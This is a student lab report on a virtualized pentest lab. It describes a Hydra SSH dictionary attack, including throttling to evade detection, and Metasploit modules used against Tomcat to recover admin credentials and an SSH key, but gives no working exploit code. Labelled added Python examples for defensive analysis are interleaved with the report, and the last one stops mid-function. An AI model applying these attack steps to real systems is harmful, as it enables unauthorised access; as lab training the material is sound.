
Network Visualization and Vulnerability Detection

CSOL570 Management and Cyber Security


Professor Brian Russell
University of San Diego

Marc Leeka

Module 7 Assignment

March 12, 2017


CSOL570 Management and Cyber Security Vulnerability Detection Marc Leeka

Table of Contents, Tables and Figures

Executive Summary ...................................................................................................................... iii

Trade Studies ..................................................................................................................................1


Figure 1: 2015 Gartner Magic Quadrant for SIEM ..................................................................1
Table 1: Evaluation criteria for SIEM products .........................................................................1
Table 2: Open-Source Network Simulators Survey ..................................................................2
Table 3: Open-Source Vulnerability Scanning Tools Survey ...................................................3
Virtualized Test Lab Architecture ..................................................................................................4
Figure 1: VirtualBox test VM descriptions and addressing ......................................................4
My Security Toolkit ........................................................................................................................5
Table 1: Security Toolkit contents ............................................................................................5
Figure 1: Standard installation default Kali Linux toolkit ........................................................5
Surveillance and Reconnaissance Processes
Scan a network to determine the operating systems installed on hosts ....................................6
Figure 1: Zenmap scan to query a host operating system ...................................................6
Figure 2: Zenmap identifies a host operating system .........................................................7
Figure 3: Zenmap maps a network topology ......................................................................7
Perform a dictionary attack against a host's SSH service .........................................................8
Figure 1: Probe the SSH port 22 on the Metasploitable-2 server .......................................8
Figure 2: Hydra run from the terminal session ...................................................................8
Figure 3: Configuring password crack using Hydra gui session ........................................9
Figure 4: Password crack for default Metasploitable-2 user MSFADMIN ........................9
Figure 5: Multiple password dictionaries are included with Kali Linux ..........................10
Launch an exploit payload against a vulnerable web service .................................................11
Figure 1: Using nmap to find the Tomcat Web service on a target ..................................11
Figure 2: Using Metasploit to exploit Tomcat modules and find password .....................12
Figure 3: Using Metasploit module to exploit Tomcat SSH private encryption key ........13
Figure 4: We have the Metasploitable-2 SSH key ............................................................14
Figure 5: Using login username and password to take control of Tomcat server .............15
Figure 6: Tomcat server user list administration ..............................................................15
Figure 7: Tomcat server roles list administration .............................................................15
Identify the ports listening on a host .......................................................................................16
Figure 1: Using Nmap to identify open listening ports on a target ...................................16
Eavesdrop on communications between two hosts .................................................................17
Figure 1: Packets captured filtered to show only host IP address .....................................17
Figure 2: Wireshark can isolate specific transport protocols or communication packets..18
Figure 3: Decoding encrypted message headers and content ...........................................18


Identify the SSID of an active wireless network ....................................................................19


Figure 1: Kismet server console as it captured wireless SSIDs ........................................19
Figure 2: Kismet client console displaying wireless SSIDs and additional detail ............19
Figure 3: Kismet packet capture activity and information for a particular SSID ..............20
Figure 4: Creating a Channel Filter to isolate Kismet SSID scanning .............................20
Figure 5: Kismet channel scanning changed to Channel 11 only .....................................20
Lessons Learned and Final Thoughts ...........................................................................................21

Appendix 1: Oracle VirtualBox installation steps ........................................................................22


Appendix 2: Kali Linux Installation and Settings Configuration .................................................26
Figure 1: VirtualBox Manager Storage Preference for Kali Linux ISO installation ..............30
Figure 2: VirtualBox Manager System Motherboard Preferences ..........................................31
Figure 3: VirtualBox Manager System Processor Preferences ...............................................31
Figure 4: VirtualBox Manager Display Processor Preferences ..............................................32
Figure 5: VirtualBox Manager Network Adapter Preferences ...............................................32
Figure 6: VirtualBox Manager Network Host-only setting vs. Bridged setting .....................33
Figure 7: VirtualBox Manager Storage Preference for Kali Linux ISO installation ..............33
Appendix 3: Metasploitable-2 Installation and Ethernet configuration ........................................34
Figure 1: Communication between the Kali Linux VM and the Metasploitable-2 VM ..........34
Figure 2: Confirm the Kali Linux VM is assigned to the correct subnet ................................35
Figure 3: Confirm the Metasploitable-2 VM is assigned to the correct subnet ......................35
Appendix 4: Results of Metasploitable-2 Vulnerability Scan using Nessus ................................36
Appendix 5: Metasploit Private Key Retrieval .............................................................................39

References ......................................................................................................................................39


Executive Summary

The concept of how to adequately secure a network has greatly expanded in recent years as devices no
one envisioned a decade ago, many of them supplied by employees, become new data ports. Training those
responsible for IT security now encompasses how to recognize a multitude of threats to the enterprise.
The availability of new products for security providers to identify, isolate and nullify intrusions also
creates the necessity for training to determine which products best fit the enterprise's particular
requirements and then to master the complexity of the sophisticated products that are selected.

The use of a virtualized test lab is a safe, effective and inexpensive method to assess the types of cyber
security tools used in network defense and an opportunity to practice deployment. Learning how to use
basic tools for securing networks against some of the more common penetration strategies is important to
all security personnel. The practice can help security personnel better identify threats, understand the
vulnerability of encryption keys, evaluate vulnerabilities and multiple options to secure them, and
visualize the network perimeter to include portable devices that often are controlled by others.

These tools and the knowledge from this training must be used only in an ethical and professional
manner. Reputation is the most valuable asset any professional can own. The Rotary International 4-Way
Test is the benchmark of whether an action is ethical: are you comfortable if everybody knows about your
intent and your actions? If you pause for only a moment to consider the consequences, then you probably
are doing something that could be considered unethical.

The bad actors who challenge a network's security are like water that flows around any barrier. They will
always find new weaknesses to exploit, and security personnel will always play cat-and-mouse to block
them. The skills accrued using virtualized testing labs are one more way of staying ahead of the bad guys.

Shameless pandering to Professor Russell: 20 Critical Security Controls poster on my office door.


Trade Studies

Personal Criteria to Evaluate Network Security Visualization Tools


I reviewed a comprehensive list compiled for the annual Gartner survey of Security Information and
Event Management network security software. All the products were big, complicated and expensive:
IBM Security, HP, LogRhythm, etc.

Figure 1: 2015 Gartner Magic Quadrant for Security Information and Event Management.

Fully understanding the features of these products was well beyond my skill level, but I did create
criteria to evaluate the different products:[1]

Ease of Administration | Visibility | Entry Cost
Security Depth | Interoperability | Total Cost of Operation
Compliance capability | Scalability | Extensibility
Performance | Fault Tolerance | Training Materials
Table 1: Evaluation criteria for Security Information and Event Management (SIEM) products.

I am a beginner and have no experience with these products. For this assignment I narrowed my criteria to
only three factors and performed a different survey:
A. Intuitive ease of use (this is my first tool and I want the fastest gain for the least pain);
B. Large user base (more answers to questions available on web search and videos);
C. Open source products that are available at no cost.

Fellow student Devin Bock mentioned GNS3 worked well with VirtualBox, so I looked at the package
and found it was easy to install, was simple to use, and was supported by many tutorials on the Internet. I
found many similar open-source simulators that eliminated the initial cost concern.


Simulator | Pros | Cons
Cloonix | Easy to use; active development |
CORE | |
GNS3 | Large user base due to strong Cisco and Juniper support |
IMUNES | |
LINE Network Emulator | Fast; reproducible results; powerful measurement capability | Requires 3 dedicated computers; complicated setup; complex; sparse documentation
Marionnet | Attractive GUI; intuitive | No user manual
Mininet | Excellent documentation; large user base |
Netkit | Good documentation; many prebuilt lab scenarios available | Command line driven
NS-3 | | Requires programming skills
OFNet | |
OpenStack all-in-one (DevStack) | |
Psimulator2 | Basic; runs on most platforms that support Java |
Shadow | Reproducible results; developers can test performance of distributed or peer-to-peer apps |
UNetLab/Eve-NG | |
VNX and VNUMI | Recently updated |
Table 2: Open-Source Network Simulators Survey, modified from Linkletter pp. 167-168.

Results of the SIEM Study


For the assignment, I chose GNS3, successfully installed the software and activated it.

GNS3 was easy to install but it is a sophisticated product, therefore it required study before I could run
scanning. GNS3 came with the most popular router and switch configurations. My office network is a
simple, single-subnet architecture far below the capabilities of GNS3. I configured a host-to-host
architecture and recorded traffic between the two.

A more comprehensive test would have required a more complicated environment (or costly test lab
investment) and additional training. A thorough comparison by a large IT department would require
considerable investment of time to learn and explore the features unique to each product.


Open-Source Vulnerability Scanning Tools Survey


Per the assignment instructions, I briefly researched an OWASP summary (as shown in the Table 3
presentation) and narrowed my choice to only open source products.

Tool | Pros | Cons
Grabber | Included with Kali; simple | Slow; not scalable
Grendel-Scan | | Almost no web information; last bug fix post was 2015
Nikto | Included with Kali; long feature list; QT Frontend GUI interface is downloadable | Any website with an IDS or other security measures in place will detect that you are scanning it
Vega | Included with Kali; multi-platform; GUI interface | Focus is web application testing
Wapiti | Acts as a fuzzer | Focus is web application testing
Wikto | Written for MS .NET | Focus is web application testing
Xenotix XSS Exploit Framework | Claims to have zero false-positive scans due to redundancy feature | Focus is web application testing, particularly XSS
ZAP | Swiss army knife of web assessment tools; multi-platform | Fails to find vulnerabilities in newer apps, more effective for older apps
Zed Attack Proxy | | Focus is web application testing
Table 3: Open-Source Vulnerability Scanning Tools Survey, from https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

I am a beginner and have no experience with these products. I narrowed my criteria to only four factors,
shown in order of importance:
A. Intuitive ease of use (this is my first tool and I want the fastest gain for the least pain);
B. Extensive user base (answers to wide range of questions available by web search and videos);
C. Embedded link between each vulnerability finding and a recommended problem resolution;
D. Comprehensive vulnerability library that is current to date (important as I gain experience with the
tool but not while I am a beginner still learning).

Results of the Open-Source Vulnerability Scanning Tools Survey


I chose Nikto. My research found that reviews categorized most of these products as tools used for web
application testing. I wanted to test network device vulnerabilities, not web sites, thus I minimized my list
quickly. In some reviews Nikto was categorized as a web application testing tool, although I learned you
could test your local devices. Given more time to try each tool, I would check if the others could be used
for a local network. Some tools were designed to harden Linux platforms; my platforms are Windows.

Comparing Nikto to Nessus was not a fair race. Nessus is a commercial product (the free version excludes
most add-in libraries and reporting features); it has a huge installed base; its GUI interface was easy to
comprehend without training; and there are countless Internet tutorials to master the product. Nessus
scanning results could quickly be ranked to focus attention on assets with the greatest critical
vulnerabilities; I could export colorful PDF reports; clicking on a particular vulnerability would link to a
suggested remediation. In short, Nessus was fun to use. Fun products are likely to be used more often.

I included a Nessus report in Appendix 4.
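The ranking described above (sorting Nessus results so that the most critical findings and the most exposed assets come first) is easy to reproduce outside the Nessus GUI once results are exported or transcribed. The Python below is an added example, not part of this report and not Nessus code; it parses findings in the plain "Severity (CVSS) Plugin Name" layout of Appendix 4 (the excerpt is transcribed from that appendix, with the two wrapped plugin names rejoined), counts them by severity, ranks them by CVSS, and computes a per-host score. The scoring rule (sum of CVSS for findings rated 7.0 or higher) is an assumed triage convention of this example, not a Nessus feature.

```python
import re
from collections import Counter

# Findings transcribed from the report's Appendix 4 for host 192.168.56.102
# (plugin names that wrapped onto two lines were rejoined). The excerpt stops
# where the report page does; the report's own summary counts 105 findings.
NESSUS_EXCERPT = """\
Critical (10.0) 10203 rexecd Service Detection
Critical (10.0) 32314 Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
Critical (10.0) 32321 Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)
Critical (10.0) 33850 Unix Operating System Unsupported Version Detection
Critical (10.0) 34970 Apache Tomcat Manager Common Administrative Credentials
Critical (10.0) 51988 Rogue Shell Backdoor Detection
Critical (10.0) 55523 vsftpd Smiley Face Backdoor
Critical (10.0) 61708 VNC Server 'password' Password
High (7.5) 10205 rlogin Service Detection
High (7.5) 34460 Unsupported Web Server Detection
Medium (6.8) 82580 Samba 3.0.0 'SamrChangePassword' RCE
Medium (6.8) 90509 Samba Badlock Vulnerability
Medium (6.4) 11356 NFS Exported Share Information Disclosure
Medium (6.4) 51192 SSL Certificate Cannot Be Trusted
"""

# One line per finding: severity word, CVSS score in parentheses, plugin id, name.
FINDING_RE = re.compile(
    r"^(?P<severity>Critical|High|Medium|Low|Info) \((?P<cvss>\d+\.\d)\) "
    r"(?P<plugin>\d+) (?P<name>.+)$"
)


def parse_findings(text, host):
    """Turn the plain-text table for one host into a list of finding dicts."""
    findings = []
    for line in text.splitlines():
        m = FINDING_RE.match(line)
        if m:  # lines that are not findings (headers, counts) are skipped
            findings.append({
                "host": host,
                "severity": m["severity"],
                "cvss": float(m["cvss"]),
                "plugin": int(m["plugin"]),
                "name": m["name"].strip(),
            })
    return findings


def severity_counts(findings):
    """Counter of findings per severity word, like the report's summary row."""
    return Counter(f["severity"] for f in findings)


def rank(findings, min_cvss=0.0):
    """Highest CVSS first; ties broken by plugin id so the order is stable."""
    return sorted((f for f in findings if f["cvss"] >= min_cvss),
                  key=lambda f: (-f["cvss"], f["plugin"]))


def host_scores(findings, threshold=7.0):
    """Assumed triage rule: a host's score is the sum of CVSS over its findings
    rated at or above `threshold`, so the asset with the most serious exposure
    sorts first when several hosts are scanned."""
    scores = Counter()
    for f in findings:
        if f["cvss"] >= threshold:
            scores[f["host"]] += f["cvss"]
    return dict(scores)


if __name__ == "__main__":
    fs = parse_findings(NESSUS_EXCERPT, "192.168.56.102")
    print(dict(severity_counts(fs)), host_scores(fs))
    for f in rank(fs, min_cvss=7.0):
        print(f"{f['cvss']:4} {f['plugin']:>6} {f['name']}")
```

Feeding the same functions a second host's excerpt, with its own address passed to parse_findings, gives a combined list that host_scores ranks across assets.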


Virtualized Test Lab Architecture

My test lab is a computer running the Windows 7 Professional 64-bit operating system. VirtualBox is
configured for four Virtual Machines.

Figure 1: VirtualBox test VM descriptions and addressing.

Virtual Machine 1
Main VM from which attacks are launched and test applications are installed. To shield my office
network from the test environment, the Kali network setting is host-only. Occasionally I need Internet
browser access from the Kali VM (e.g., to download Nessus), so I change the network setting to Bridged
or NAT. I installed both GNS3 and Nessus to this VM. Because this VM is my workhorse and is
usually booted before the other VMs, it usually gets the first VirtualBox DHCP address from the
range 192.168.56.101 through 192.168.56.199. IP assignments may change based on boot order. This VM is
also where I ran Wireshark, Airmon-NG, John the Ripper, Hydra and other Kali tools.

Virtual Machine 2
This is the Metasploitable-2 VM which is a VMDK container. When running attacks from the Kali
Virtual Machine 1, the Metasploitable-2 VM must run simultaneously on the same subnet.

Virtual Machine 3
This is the CentOS operating system installation with the WebGoat install from the first assignment.
After I learned the differences among NAT, Bridged and Host-only network settings, I temporarily
assigned a Bridged address to this VM in order to download and install the WebGoat application. If I
were to start this again after learning how the various network settings work, I would install Kali and
skip the CentOS, although it was a good learning experience if I ever need that OS again.

Virtual Machine 4
This is a Windows OS VM in which I installed the SolarWinds SIEM test environment. I chose
Windows because I was more comfortable with the Windows version of the SolarWinds trial
application.

My installation for Kali Linux and Oracle VirtualBox is documented in Appendices 1 and 2.


My Security Toolkit

Tool | Purpose | Notes
SolarWinds | Server and application monitor | 30-day free trial; $2995 starter package
GNS3 | Design and test network architecture in a virtual environment | Open source
Nessus | Network vulnerability tester | Free home license for <16 IP addresses
Wireshark | Capture and decode network packets | Included with Kali Linux install
Nikto | Webserver vulnerability scanner | Included with Kali Linux install
Kismet | Wireless signal capture | Included with Kali Linux install
Aircrack-NG | Multi-purpose wireless attack suite | Included with Kali Linux install
Google Earth | Maps KML wireless GPS data capture files | Free download
Hydra | Password brute force utility | Included with Kali Linux install
John the Ripper | Password brute force utility | Included with Kali Linux install
Zenmap | GUI version of nmap network discovery | Included with Kali Linux install
Metasploit | Platform for developing, testing and executing exploits | Included with Kali Linux install
Table 1: Security Toolkit contents.

The default Kali Linux installation includes 300+ utilities that are grouped into 13 categories. There are
multiple tools available for password brute force attacks, for example. As my security testing experience
grows, there are plenty of opportunities to try new tools.

Figure 1: Standard installation default Kali Linux toolkit.


Surveillance and Reconnaissance Processes

Scan a network to determine the operating systems installed on hosts

For the Module One assignment, I used Nmap to scan for open ports. For this assignment, I used Nmap
with the -O option to guess the host operating system. Then I used the Zenmap GUI version of Nmap to
scan a specific workstation in my office subnet.

Figure 1: Zenmap scan to query a host operating system.


Figure 2: Zenmap identifies a host operating system.

Figure 3: Zenmap maps a network topology.


Perform a dictionary attack against a host's SSH server

I used Hydra for this assignment.

Figure 1: Probe the SSH port 22 on the Metasploitable-2 server.

First, make sure the SSH port 22 is open and listening on our Metasploitable-2 server.

Figure 2: Hydra run from the terminal session.

We can perform a brute force password attack using Hydra. We will feed it the built-in password text file
from another brute force tool, John the Ripper (which is included in the default Kali installation).

To open the GUI Hydra interface:

root@kali:~# xhydra    # opens the GUI Hydra interface


Set the number of tasks to 1 to reduce congestion and the chance that the target server might detect the attack.
Reducing the tasks, however, will make Hydra take longer to complete.

Figure 3: Configuring password crack using Hydra gui session.

I used a password file that contained 3,546 entries and I was unsuccessful cracking the Metasploitable-2
username root. Because I knew the default user msfadmin password, I edited the password file list to
include the entry msfadmin just to verify the utility worked. I ran the attack against the user
MSFADMIN and it discovered the username and password combination.

Figure 4: Password crack for default Metasploitable-2 user MSFADMIN.


The default Kali Linux installation includes many password dictionary files.

Figure 5: Multiple password dictionaries are included with Kali Linux.

I ran Hydra using the rockyou.txt password file containing 14,344,392 entries. After running 24 hours and
450,000 unsuccessful attempts to crack the Metasploitable root password, I stopped the utility so that I
could use my test lab computer for other purposes.

I developed a great appreciation for how easy it was to obtain the software and dictionary to perform a
real-world brute force attack.
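Detection is the other side of this experiment. The report notes that lowering Hydra's task count reduces the chance that the target notices; the following Python script, added here as an illustration and not part of the original report, of Hydra or of Kali, shows how the attempt still shows up in the SSH server's authentication log. It parses constructed sshd log lines (the sample is made up, not captured from the author's lab; the host name, addresses and thresholds are assumptions) and opens an alert when one source address exceeds a threshold of failed logins inside a sliding window. A slowed-down attack that a 60-second window would miss is caught by widening window_seconds; a successful login from an address that was already alerted on is recorded separately because that case needs an immediate response rather than a ticket.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of sshd entries in syslog format (assumption: not captured
# from the author's lab). Five failures in eight seconds from one address, then
# a successful login from that address, then unrelated activity from another.
SAMPLE_AUTH_LOG = """\
Mar 12 10:00:01 metasploitable sshd[2201]: Failed password for root from 192.168.56.101 port 51002 ssh2
Mar 12 10:00:03 metasploitable sshd[2203]: Failed password for root from 192.168.56.101 port 51004 ssh2
Mar 12 10:00:04 metasploitable sshd[2205]: Failed password for invalid user admin from 192.168.56.101 port 51006 ssh2
Mar 12 10:00:06 metasploitable sshd[2207]: Failed password for root from 192.168.56.101 port 51008 ssh2
Mar 12 10:00:07 metasploitable sshd[2209]: Failed password for root from 192.168.56.101 port 51010 ssh2
Mar 12 10:00:09 metasploitable sshd[2211]: Accepted password for msfadmin from 192.168.56.101 port 51012 ssh2
Mar 12 10:05:00 metasploitable sshd[2300]: Failed password for msfadmin from 192.168.56.103 port 40001 ssh2
Mar 12 10:30:00 metasploitable sshd[2310]: Accepted publickey for msfadmin from 192.168.56.103 port 40002 ssh2
"""

# One pattern for the two sshd outcomes that matter here. sshd writes
# "invalid user" when the account does not exist; it is skipped so the
# account name is still captured.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_auth_log(text, year=2017):
    """Return (timestamp, result, user, source_ip) tuples. Syslog timestamps
    carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd or system lines are not relevant here
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window count of failed logins per source address.

    An alert is opened the first time a source reaches `threshold` failures
    within `window_seconds`; later failures update it, and a later successful
    login from an alerted source is recorded in `success_after`.
    """
    recent = defaultdict(deque)   # src -> failure timestamps inside the window
    users = defaultdict(set)      # src -> account names tried
    alerts = {}
    for ts, result, user, src in sorted(events):
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            users[src].add(user)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()  # drop failures that fell out of the window
            if src in alerts:
                alerts[src]["failures"] += 1
                alerts[src]["last_seen"] = ts
                alerts[src]["users"] = sorted(users[src])
            elif len(q) >= threshold:
                alerts[src] = {
                    "first_seen": q[0],
                    "last_seen": ts,
                    "failures": len(q),
                    "users": sorted(users[src]),
                    "success_after": None,
                }
        elif src in alerts:  # Accepted login from an address already alerted on
            alerts[src]["success_after"] = (ts, user)
    return alerts


if __name__ == "__main__":
    for src, a in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{src}: {a['failures']} failures against {a['users']}, "
              f"success after alert: {a['success_after']}")
```

On a real host the input would be the contents of /var/log/auth.log (Debian-based systems) passed to parse_auth_log with the correct year.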


Launch an exploit payload against a vulnerable web service

For this assignment to launch an exploit payload against a web service, I used Nmap to query the
Metasploitable-2 VM for vulnerabilities. I found open port 8180 and identified the web service as Apache
Tomcat.

Figure 1: Using nmap to find the Tomcat Web service on a target.


From my Kali Linux VM attack station, I opened the Metasploit console to search for Tomcat exploit
modules.

I ran the exploit module, which required that I set attack parameters. I found the Metasploitable-2 Tomcat
administration username and password.

Figure 2: Using Metasploit to exploit Tomcat modules and find administrative username and password.


Using the administrator username and password, I ran another Tomcat exploit module to find the SSH
private encryption key.

Figure 3: Using Metasploit module to exploit Tomcat SSH private encryption key.


Figure 4: We have the Metasploitable-2 SSH private encryption key.


We now have the private encryption key.

Following a procedure, we can regenerate the SSH-RSA key and take control of the authentication
encryption.[3] This assignment did not ask us to complete that step, but we could use the administrative
login username and password we found earlier to take control of the Tomcat web server.

Figure 5: Using login username and password to take control of Tomcat server.

We can add and delete authorized users. We can change passwords.

Figure 6: Tomcat server user list administration.

We can elevate user roles.

Figure 7: Tomcat server roles list administration.


Identify the ports listening on a host

Figure 1: Using Nmap to identify open listening ports on a target.

I used Nmap on the Kali Linux VM station to identify open listening ports on the Metasploitable-2 VM.


Eavesdrop on communications between two hosts

I used Wireshark to eavesdrop between two hosts. Wireshark allows you to filter the source and
destination addresses to minimize the information on your screen.

I configured my Kali Linux VM for Bridged mode to allow Internet traffic. In particular, I was looking
for encrypted communication traffic between my DNS server 192.168.4.7 and the VM with the address
192.168.4.195.

Figure 1: Packets captured, filtered to show only host IP address 192.168.4.7.


Figure 2: Wireshark can isolate specific transport protocols or communication packets.

In this example I isolated the TLS protocol exchange and identified the encrypted message.

Figure 3: Decoding encrypted message headers and content.
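What Wireshark shows in Figure 3 is the part of a TLS exchange that is never encrypted: the record header and the handshake messages, including the server name the client asks for, while the application data that follows is opaque. The Python below is an added example, not part of this report and not Wireshark code. It builds a minimal TLS 1.2 ClientHello (a constructed message, not a capture from the author's lab; the host name dns.example.test is made up) and decodes from it the same fields an analyst reads off a capture, then shows that an application_data record yields only its type and length. A capture from the Kali VM could be fed to parse_tls_record one record at a time once the Ethernet, IP and TCP headers are stripped.

```python
import struct

CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake",
                 23: "application_data"}
HANDSHAKE_TYPES = {1: "client_hello", 2: "server_hello", 11: "certificate",
                   14: "server_hello_done", 16: "client_key_exchange"}
VERSIONS = {(3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}


def build_client_hello(server_name, cipher_suites=(0xC02F, 0xC030)):
    """Assemble a minimal TLS 1.2 ClientHello with one server_name extension.
    Constructed test input; real clients send many more extensions."""
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name   # type host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    extensions = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (b"\x03\x03"                         # client_version: TLS 1.2
            + bytes(range(32))                  # 32-byte random, fixed here
            + b"\x00"                           # empty session id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                       # one compression method: null
            + struct.pack("!H", len(extensions)) + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    # Record layer advertises TLS 1.0 for compatibility, as real clients do.
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_tls_record(data):
    """Decode the 5-byte record header and, for a handshake record, the
    cleartext handshake fields; application_data is reported as opaque."""
    if len(data) < 5:
        raise ValueError("short record header")
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    if ctype not in CONTENT_TYPES:
        raise ValueError(f"unknown content type {ctype}")
    payload = data[5:5 + length]
    if len(payload) != length:
        raise ValueError("truncated record")
    info = {"content_type": CONTENT_TYPES[ctype],
            "record_version": VERSIONS.get((major, minor), f"{major}.{minor}"),
            "length": length,
            "encrypted": ctype == 23}
    if ctype == 22:
        htype = payload[0]
        hlen = int.from_bytes(payload[1:4], "big")
        info["handshake_type"] = HANDSHAKE_TYPES.get(htype, htype)
        if htype == 1:
            info.update(_parse_client_hello(payload[4:4 + hlen]))
    return info


def _parse_client_hello(b):
    version = VERSIONS.get((b[0], b[1]), f"{b[0]}.{b[1]}")
    pos = 2 + 32                                    # skip version and random
    pos += 1 + b[pos]                               # session id
    cs_len = struct.unpack("!H", b[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", b[i:i + 2])[0]
              for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + b[pos]                               # compression methods
    server_name = None
    if pos + 2 <= len(b):                           # extensions are optional
        ext_len = struct.unpack("!H", b[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", b[pos:pos + 4])
            edata = b[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype == 0 and len(edata) >= 5:      # server_name extension
                name_len = struct.unpack("!H", edata[3:5])[0]
                server_name = edata[5:5 + name_len].decode("ascii", "replace")
    return {"client_version": version, "cipher_suites": suites,
            "server_name": server_name}


if __name__ == "__main__":
    print(parse_tls_record(build_client_hello("dns.example.test")))
    print(parse_tls_record(b"\x17\x03\x03\x00\x05hello"))
```

The cipher suite numbers print as integers; Wireshark maps them to names such as TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 from the IANA registry, which is a lookup this example leaves out.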


Identify the SSID of an active wireless network

Kismet is a server and client combination. The Kismet server console shows local SSIDs as they are
captured.

Figure 1: Kismet server console as it captured wireless SSIDs.

The Kismet client console presents wireless SSID information in an easy-to-quickly-comprehend format.
SSIDs are color-coded to quickly identify potentially vulnerable wireless configurations.

Figure 2: Kismet client console displaying wireless SSIDs and additional detail.

Type A = access point.
Green indicates open access points.
Red indicates access points that may have factory default settings.


Figure 3: Kismet packet capture activity and information for a particular SSID.

Knowing the wireless access point manufacturer will help us find vulnerabilities for that model.

Figure 4: Creating a Channel Filter to isolate Kismet SSID scanning.

Isolating a particular wireless channel will reduce the visual information we analyze.

Figure 5: Kismet channel scanning changed to Channel 11 only.


Lessons Learned and Final Thoughts

A test platform is a safe what-if environment that allows for experimentation and scenario testing. A
graduate program prepares us to become the Chief Information Officer, but even the highest-paid CIO at
a large enterprise should have experience doodling on a Kali test platform. The CIO might not use a test
platform daily but certainly the CIO would direct others using test platforms to solve problems and
answer questions. Test platforms are our practice for preparation.

From the test platform experience I learned there were many applications available to address the
assignment objective, and the final selection could involve cost, complexity, learning curve, thoroughness,
reliability, reputation, features and support. I discovered that many tools were quite simple to master; it
was the test environment that demanded the greatest investment of time and thought.

Some rules I learned:

a) Allow plenty of time to prepare the test environment. Something will not work and it might take
weeks to figure out a simple configuration adjustment. Better to solve this at our convenience than
when the enterprise is down.
b) The VirtualBox network preference configuration is important, and an incorrect setting could make
your network leak into a working environment.
c) The Metasploitable 2 VM is an interesting and extremely valuable training tool. It offers dozens of
different opportunities to practice different exploits. Internet tutorials abound.
d) Some of the simplest terminal session commands, such as Nmap, yield a treasure trove of valuable
information in seconds.
e) Many of the tools included with the default Kali Linux installation are easily mastered and very
powerful. It would be wise for a security student to casually sample those tools to prepare before they
are in a crisis situation. Wireshark and Kismet are logically-designed utilities that provide huge
results in a short time for little training.

Networks are expanding by the inclusion of devices that users find convenient but are often poorly
designed for security. The network perimeter is only as strong as its weakest point. New tools must be
developed to constantly monitor and discover network vulnerabilities that an IT staff may not be aware
of. Training for the IT staff must be broadened to encompass new threats, and users must also be trained
to recognize how they can create security breaches just by using their favorite device.

Understanding how threat surfaces are expanding is critical when you plan for potential new threats.
Recognizing, hardening architectures and responding to new threats will take more skills than any single
person can ever possess. The expertise and experience just to understand the expanded surface will likely
become so specialized that it will become a specialty; likewise the increasingly more advanced skill set to
properly configure preventative measures and monitor systems will become a specialty separate from the
skills responders must possess when a problem is detected.

The potential threats will only increase in the future. This is a good time to be trained in this field.


Appendix 1: Oracle VirtualBox installation




Also, install the extensions found at https://www.virtualbox.org/wiki/Downloads


Appendix 2: Kali Linux Installation and Settings Configuration

Download the most recent Kali Linux ISO from https://www.kali.org/downloads/

The host is a 64-bit Windows computer.

The Kali Linux ISO is installed after you configure a new VM; then you start the VM and the Linux ISO
will prompt you for installation instructions.




Create the Kali Linux VM VMDK and finish.


Figure 1: VirtualBox Preferences Network Host-only Preferences for the internal DHCP server.

Verify that the host VirtualBox Preferences Network detail is correct so that the two VMs can
communicate with one another on an internal-only subnet that will not interfere with other network
traffic.
a) "Never expose this VM to an untrusted network, use NAT or Host-only mode!"
https://www.offensive-security.com/metasploit-unleashed/requirements/
b) "VirtualBox has a virtual NAT server built-in to its software to allow for basic routing. Any basic
VirtualBox install will be able to use DHCP to connect to and use the host machine's network via the
NAT setup in VirtualBox."
http://superuser.com/questions/961526/problems-with-local-networking-on-kali-linux
c) The default VirtualBox configuration is set for the subnet 192.168.56.xx.
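A quick way to enforce the isolation rule above before booting the lab is to check each VM's adapter attachment from the host rather than trusting memory. The Python below is an added example, not part of this report and not Oracle's code; it parses the output of the real command `VBoxManage showvminfo "<vm name>" --machinereadable` (the two samples are constructed and trimmed to the network keys, with made-up VM and adapter names) and flags a bridged adapter as an error and a NAT adapter as a warning, since NAT blocks inbound connections but still lets the VM reach the host's network and the Internet. Host-only and internal-network attachments pass.

```python
import re
import sys

# Constructed samples of `VBoxManage showvminfo <vm> --machinereadable` output,
# trimmed to the network keys (assumption: real output carries many more keys).
HOST_ONLY_VM = '''\
name="Kali"
nic1="hostonly"
hostonlyadapter1="VirtualBox Host-Only Ethernet Adapter"
macaddress1="080027A1B2C3"
nic2="none"
nic3="none"
'''

LEAKY_VM = '''\
name="Metasploitable-2"
nic1="bridged"
bridgeadapter1="Intel(R) Ethernet Connection"
nic2="nat"
nic3="none"
'''

# key="quoted value" or key=bare value, one per line.
KV_RE = re.compile(r'^(?P<key>\w+)=(?:"(?P<quoted>[^"]*)"|(?P<bare>.*))$')


def parse_showvminfo(text):
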